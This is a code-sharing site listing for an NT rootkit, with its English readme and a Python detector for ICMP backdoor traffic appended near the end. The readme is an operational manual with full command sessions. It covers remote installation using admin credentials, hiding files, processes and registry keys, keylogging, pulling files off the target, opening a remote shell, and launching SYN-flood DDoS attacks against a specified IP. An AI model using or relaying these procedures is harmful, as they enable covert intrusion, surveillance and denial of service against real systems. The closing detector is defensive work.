nt_rootkit
Category: Other
Development tool: Visual C++
File size: 11KB
Downloads: 63
Upload date: 2007-04-23 15:47:12
Uploader: alyo
Description: NT_rootkit source code written by a member of a rootkit group abroad.
yyt_hac's ntrootkit 1.1 Readme
The first thing you should know about this rootkit is that the built-in
backdoor can communicate with the client in 4 ways (0:Userdefined, 1:Icmp,
2:Udp, 3:Tcp). All of them are connectionless: the server never opens a
listening socket of its own, it picks its commands out of packets that are
addressed to a port already open on the host (in sniffer or driver mode, see
-m below and the notes at the end), so a utility like fport.exe will not show
a connection because there isn't one. TCP and UDP are the most reliable.
Also of importance is that the default password is yyt_hac. This can and
should be changed, but for connecting to the backdoor for the first time it
must be used.
-Local Installation and Commandline Options
C:\WINNT\system32>ntrootkit -h
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Usage:ntrootkit \\ip -u username -p password
ip the computer you want to install ntrootkit on
-u [username] admin account on remote computer
-p [password] admin password on remote computer
Usage:ntrootkit [-v/-m/-u [password]/-i [password]]
-v show the ntrootkit version that is installed
-u [password] uninstall the ntrootkit
-i [password] update the ntrootkit, the new version will be run after
reboot
-m show the work mode of the ntrootkit
-m [workmode] set the workmore of the rootkit (0=sniffer, 1=driver)
C:\WINNT>ntrootkit //local install, run without any options
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Exacting files.....ok
Installing service..ok
Starting up The Ntrootkit..ok
The Ntrootkit is installed and started successfully!
C:\WINNT>ntrootkit -m
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
The ntrootkit is using windows 2000 sniffer mode to recv packet
//This mode is not very stable; driver mode (-m 1) is highly recommended
C:\WINNT\>ntrootkit -v
ntrootkit -v
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
The Version of Ntrootkit that is installed is 1.1
C:\WINNT\system32>ntrootkit -i [password] //update the rootkit: the current password is asked for, the new version runs after a reboot
ntrootkit -i
yyt_hac
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Please enter you password:
Please wait a minute.....
Update successfully,the new version very runs after system reboots!
-Remote Installation
F:\letmein>ntrootkit \\202.38.*.* -u administrator -p 123456
This is yyt_hac's ntrootkit server 1.1
Welcome to http://www.yythac.com
Connecting to remote computer...ok
Exacting files.....ok
Installing service..ok
Starting up The Ntrootkit..ok
Disconnecting...ok
The Ntrootkit is installed and started successfully!
-Backdoor
L:\c\rootkit\44\RTCLIENT\Release>rtclient
It is yyt_hac's ntrootkit client 1.1
Welcome to http://www.yythac.com
usage:rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type]
[-d icmp_code] [-m MTU] [-c Command]
destip-------------The computer you want to connect
password-----------The ntrootkit's password
proto--------------The proto that ntrootkit will
use(0:userdefined,1:icmp,2:udp,3:tcp)
port---------------The dest udp or tcp port which send packet to (default
is 445)
MTU----------------The MAX packet size the ntrootkit will use to send
packet(if not provided ,the program will get it automatically )
icmp_type----------The icmp packet type which send to server,default is
ICMP_ECHO REPLY
icmp_code----------The icmp packet code which send to server,default is 0
Command------------The command which you want the server to do
The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type
DDos_seconds DDos_ProcCount]
DDos_Destip--------The computer you want to DDos
DDos_Destport------The Destport you want to DDos (default is 445)
DDos_type----------The DDos type you want to use (0:ping flood,1:udp
flood,2:synflood,3:mstream flood,default is 0)
DDos_seconds-------The seconds you want to DDos the dest (default is 150s)
DDos_ProcCount-----The process count which the server use to ddos (default
is 10)
//the only required command-line options are destip and password; the others
have default values
L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3
It is yyt_hac's ntrootkit client 1.0
Welcome to http://www.yythac.com
Getting ip address of the computer...
1. 1.1.1.89
2. 1.1.1.200
Please Select the number of the ip address you want to use to send and recv
packet:1
Time out,Please make sure the target is up and try again
//if the default port 445 does not work (the client times out), try another port that is open on the target with the -o option
L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 -o 139
It is yyt_hac's ntrootkit client 1.1
Welcome to http://www.yythac.com
Getting ip address of the computer...
1. 1.1.1.89
2. 1.1.1.200
Please Select the number of the ip address you want to use to send and recv
packet:1
Welcome to yyt_hac's ntrootkit Server 1.0,use '?' command to get command
list
CMD>?
********yyt_hac's ntrootkit Server Command List********
?-------------------------------Show this list
HideFileDir [FileName or DIR]----------------------Hide the file or
directory
HideProcId [pid]----------------Hide process with the id
HideProcName [procname]---------Hide process with the process name
HideKey [KeyName]---------------Hide a registry key
HideValue [ValueName]-----------Hide a registry value
HideUser [UserName]-------------Hide a User
HideServ [ServiceName]----------Hide a Service
ShowFileDir FileName or DIR-----UnHide the file or directory that been
hidden before
ShowProcId pid------------------UnHide the process that been hidden before
with the id
ShowProcName procname-----------UnHide the process that been hidden before
with the process name
ShowKey KeyName-----------------UnHide the registry key
ShowValue ValueName-------------UnHide the registry value
ShowUser UserName---------------UnHide the user that been hidden before
ShowServ ServiceName------------UnHide the service that been hidden before
Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer
Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer
KeyLogOn------------------------------Start key log
KeyLogOff-----------------------------Stop key log
DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds
DDos_ProcCount]---DDos the destip
SDDOS---------------------------------Stop DDos
GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password
file to local computer
DelPwd--------------------------------Del the ntrootkit keylog password
file
Ps------------------------------------Show all processes on remote machine
Kill pid------------------------------Kill the process with the id or name
RTVer---------------------------------Show Ntrootkit server version and
author info
SetPass [NewPassword]-----------------Change or show the connection
password
Reboot--------------------------------Reboot the targer computer
OpenShell-----------------------------Open a command shell
Exit----------------------------------Exit the shell or rootkit
//notes
Call any Hide* command (HideKey, HideServ, etc.) without a parameter to see a
list of the currently hidden items
HideUser [UserName]-------------------Not implemented yet
HideServ [ServiceName]----------------Hide a service by service name, NOT
display name
CMD>ps //list all processes on the target, including hidden ones
ProcessID ProcessName
0 [System Process]
8 System
176 smss.exe
200 csrss.exe
224 WINLOGON.EXE
252 services.exe
2*** LSASS.EXE
452 svchost.exe
508 spoolsv.exe
536 NETDDE.EXE
13*** ntfrs.exe
1392 NTservice.exe
1404 NTweb.exe
1412 CCP.exe
1900 termsrv.exe
1952 winmgmt.exe
1968 winvnc.exe
1992 dns.exe
2032 inetinfo.exe
2076 ismserv.exe
2512 explorer.exe
2720 internat.exe
2728 sqlmangr.exe
2652 plog.exe
2624 SysArchive.exe
2752 svchost.exe
3160 DWRCS.EXE
11544 SpntSvc.exe
23028 CCProxy.exe
27096 mshta.exe
27***0 PSEXESVC.EXE
28008 cmd.exe
27872 rtkit.exe
CMD>kill 27096
process is been killed !
CMD>rtver
The ntrootkit version is 1.1,
welcome to http://www.yythac.com
CMD>hideprocid //list hidden process ids (none yet)
The Hide ProcId:
CMD>keylogon //start keylogger
Key log Start successfully
CMD>ddos 202.23.3.14 139 2 30 //SYN flood 202.23.3.14 on port 139 for 30 seconds
DDos dip:202.23.3.14,DDos dport:139,DDos type:2,DDos seconds:30,DDos
process count:10,
DDos started successfully!
CMD>ddos 202.23.3.14 139 2 30 //only one DDoS can run at a time
DDos already started
CMD>sddos //stop running dos attack
Stop DDos sucessfully!
CMD>openshell //spawn a Windows command shell on the target
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1***5-2000 Microsoft Corp.
C:\WINNT\system32>hideprocid //1500 is the command shell's process id; it is added to the hidden list automatically and removed when the shell exits
The Hide ProcId:
1500
C:\WINNT\system32>cd \
cd \
C:\>dir/w
dir/w
 Volume in drive C has no label.
 Volume Serial Number is B472-5102
 Directory of C:\
89.bat Ad1nt40.zip ADMIN.CSV
ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV
BHP015.IN_ [chenhu2] DNSMGMT.MS_
[Documents and Settings] [FASROOT] [ie]
[Inetpub] logfile.txt MD56KVCDRV.exe
[MSSQL7] PARSER.IN_ PDOXUSRS.NET
[Program Files] ququ ra_slave.log
sql [Tappupdate] TEMP.SYS
[test] tsc.zip WARRING.txt
[WINNT] 新建 文本文?.txt
19 File(s) 3,586,720 bytes
10 Dir(s) 1,213,169,6*** bytes free
C:\>hidefiledir *logfile.txt //hide every file whose name ends with (or is) logfile.txt; the pattern is stored uppercased
HideFileDir:successfully
C:\>dir/w
dir/w
 Volume in drive C has no label.
 Volume Serial Number is B472-5102
 Directory of C:\
89.bat Ad1nt40.zip ADMIN.CSV
ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV
BHP015.IN_ [chenhu2] DNSMGMT.MS_
[Documents and Settings] [FASROOT] [ie]
[Inetpub] MD56KVCDRV.exe [MSSQL7]
PARSER.IN_ PDOXUSRS.NET [Program Files]
ququ ra_slave.log sql
[Tappupdate] TEMP.SYS [test]
tsc.zip WARRING.txt [WINNT]
新建 文本文?.txt
18 File(s) 3,586,582 bytes
10 Dir(s) 1,213,169,6*** bytes free
C:\>hidefiledir //the file is gone from the listing above; list the hidden patterns
The Hide File or Dir:
*LOGFILE.TXT
C:\>showfiledir *logfile.txt //unhide *logfile.txt
ShowFileDir:successfully
C:\>showfiledir *logfile.txt //a second call fails, the pattern is no longer in the hidden list
ShowFileDir:already hidden or not found
C:\>dir/w //there it is again
dir/w
 Volume in drive C has no label.
 Volume Serial Number is B472-5102
 Directory of C:\
89.bat Ad1nt40.zip ADMIN.CSV
ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV
BHP015.IN_ [chenhu2] DNSMGMT.MS_
[Documents and Settings] [FASROOT] [ie]
[Inetpub] logfile.txt MD56KVCDRV.exe
[MSSQL7] PARSER.IN_ PDOXUSRS.NET
[Program Files] ququ ra_slave.log
sql [Tappupdate] TEMP.SYS
[test] tsc.zip WARRING.txt
[WINNT] 新建 文本文?.txt
19 File(s) 3,586,720 bytes
10 Dir(s) 1,213,169,6*** bytes free
C:\>get tsc.zip //fails with a relative path even though C:\tsc.zip exists; use absolute paths on both sides
Can't open file
C:\>get c:\tsc.zip d:\zips\tsc.zip //download c:\tsc.zip from the target to d:\zips\tsc.zip on the client
................................................................................
................................................................................
..................Get file sucssesfully!
C:\>put c:\logfile.txt c:\f.txt //upload the client's c:\logfile.txt to c:\f.txt on the target
.....Put file successfully!
C:\>dir/w
dir/w
 Volume in drive C has no label.
 Volume Serial Number is B472-5102
 Directory of C:\
89.bat Ad1nt40.zip ADMIN.CSV
ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV
BHP015.IN_ [chenhu2] DNSMGMT.MS_
[Documents and Settings] f.txt [FASROOT]
[ie] [Inetpub] logfile.txt
MD56KVCDRV.exe [MSSQL7] PARSER.IN_
PDOXUSRS.NET [Program Files] ququ
ra_slave.log sql [Tappupdate]
TEMP.SYS [test] tsc.zip
WARRING.txt [WINNT] 新建 文本文?.txt
20 File(s) 3,593,221 bytes
10 Dir(s) 1,213,161,472 bytes free
C:\>del f.txt
del f.txt
C:\>exit //exit the shell, back to the backdoor prompt
CMD>exit //exit the backdoor
exit successfully
bye bye
F:\letmein>
1. If you and the target machine do not have an external address, you can
only use the TCP/UDP protocols for the backdoor, but you may still specify a
different port.
2. Since the backdoor is connectionless, you must piggyback on an existing
open port, like those below:
UDP - 445,137,138,500,4000,53, etc.
TCP - 445,139,80,21,23,135,53, etc.
3. The backdoor client and the rootkit on the same machine cannot
communicate, meaning that trying to connect to localhost with the client will
not work.
4. Machines with valid external IPs can use TCP/UDP/ICMP. TCP/UDP are
recommended, unless the machine is locked up tight but pings can get through,
in which case ICMP is the best choice.
5. If you do not exit the backdoor properly with the exit command, wait a
few minutes before reconnecting.
6. In the sniffer working mode the backdoor can become unreachable under high
network traffic volume; use at your own judgement.
7. Do not forget to change the rootkit password with the SetPass command; the
default is yyt_hac.
8. Use corresponding client and rootkit versions; backwards and forwards
compatibility is not guaranteed.
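The ICMP transport described in the opening paragraph and in notes 2 and 4 above sends the client's commands as ICMP Echo Reply packets (rtclient's default icmp_type) to a host that never sent the matching request. The following Python is an added detection example, not code from the ntrootkit package or its author: it pairs Echo Replies arriving at a host with the Echo Requests that host sent and reports replies that have no request, arrive too late, or carry data different from the request they claim to answer. The sample packets, the addresses and the payload bytes are constructed for the example; the readme does not document the backdoor's wire format, so the command bytes are placeholders.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


@dataclass(frozen=True)
class IcmpPacket:
    """One ICMP Echo packet as a sensor would decode it (ts in seconds)."""
    ts: float
    src: str
    dst: str
    icmp_type: int
    ident: int      # Echo identifier field
    seq: int        # Echo sequence number field
    payload: bytes


@dataclass(frozen=True)
class Alert:
    ts: float
    peer: str
    ident: int
    seq: int
    reason: str


class EchoReplyDetector:
    """Pairs Echo Replies arriving at local_ip with the Echo Requests it sent.

    RFC 792 requires a reply to carry the identifier, sequence number and
    data of the request it answers, so a reply with no outstanding request,
    one arriving long after its request, or one whose data differs from the
    request is not a ping answer and is reported.
    """

    def __init__(self, local_ip: str, window: float = 5.0) -> None:
        self.local_ip = local_ip
        self.window = window
        # (peer, ident, seq) -> (time the request left, request payload)
        self._outstanding: Dict[Tuple[str, int, int], Tuple[float, bytes]] = {}
        self.alerts: List[Alert] = []

    def observe(self, pkt: IcmpPacket) -> Optional[Alert]:
        if pkt.src == self.local_ip and pkt.icmp_type == ICMP_ECHO_REQUEST:
            self._outstanding[(pkt.dst, pkt.ident, pkt.seq)] = (pkt.ts, pkt.payload)
            return None
        if pkt.dst != self.local_ip or pkt.icmp_type != ICMP_ECHO_REPLY:
            return None
        key = (pkt.src, pkt.ident, pkt.seq)
        if key not in self._outstanding:
            reason = "no matching echo request"
        else:
            sent_ts, sent_payload = self._outstanding.pop(key)
            if pkt.ts - sent_ts > self.window:
                reason = "reply arrived after the pairing window"
            elif pkt.payload != sent_payload:
                reason = "reply data differs from the request"
            else:
                return None          # an ordinary answer to our own ping
        alert = Alert(pkt.ts, pkt.src, pkt.ident, pkt.seq, reason)
        self.alerts.append(alert)
        return alert

    def run(self, packets) -> List[Alert]:
        for pkt in sorted(packets, key=lambda p: p.ts):
            self.observe(pkt)
        return self.alerts

    def suspicious_peers(self, min_alerts: int = 2) -> List[str]:
        """Peers with at least min_alerts unexplained replies: one stray reply
        may be a late answer, a run of them from one peer is a channel."""
        counts: Dict[str, int] = {}
        for a in self.alerts:
            counts[a.peer] = counts.get(a.peer, 0) + 1
        return sorted(p for p, n in counts.items() if n >= min_alerts)


# Constructed sample traffic for this example, not a real capture.
LOCAL_IP = "192.0.2.10"
PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"   # the usual 32-byte Windows ping payload
SAMPLE_PACKETS = [
    # an ordinary ping: request out, matching reply back 2 ms later
    IcmpPacket(1.000, LOCAL_IP, "192.0.2.1", ICMP_ECHO_REQUEST, 0x0200, 1, PING_DATA),
    IcmpPacket(1.002, "192.0.2.1", LOCAL_IP, ICMP_ECHO_REPLY, 0x0200, 1, PING_DATA),
    # three replies from a host this machine never pinged, each carrying data
    # (placeholder bytes; the backdoor's real command format is undocumented)
    IcmpPacket(2.000, "203.0.113.7", LOCAL_IP, ICMP_ECHO_REPLY, 0x4141, 1, b"command-1"),
    IcmpPacket(2.300, "203.0.113.7", LOCAL_IP, ICMP_ECHO_REPLY, 0x4141, 2, b"command-2"),
    IcmpPacket(2.600, "203.0.113.7", LOCAL_IP, ICMP_ECHO_REPLY, 0x4141, 3, b"command-3"),
]


def detect(packets=SAMPLE_PACKETS, local_ip: str = LOCAL_IP) -> EchoReplyDetector:
    """Run the detector over a packet list and return it for inspection."""
    det = EchoReplyDetector(local_ip)
    det.run(packets)
    return det


if __name__ == "__main__":
    d = detect()
    for a in d.alerts:
        print(f"{a.ts:.3f} {a.peer} id=0x{a.ident:04x} seq={a.seq}: {a.reason}")
    print("suspicious peers:", d.suspicious_peers())
```

Run against the sample, the ordinary ping exchange produces nothing and the three replies from 203.0.113.7 are each reported with "no matching echo request", which puts that peer on the suspicious list. The same pairing logic applies on the other transports in spirit: a TCP or UDP packet to port 445 or 139 that belongs to no socket the host ever opened is the equivalent tell, but matching it needs connection state from the host rather than ICMP fields.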
-Thanks to Joe Warshaw for this English readme
Web:http://www.yythac.com
Email:webmaster@yythac.com
QQ:47090005
icq:272288117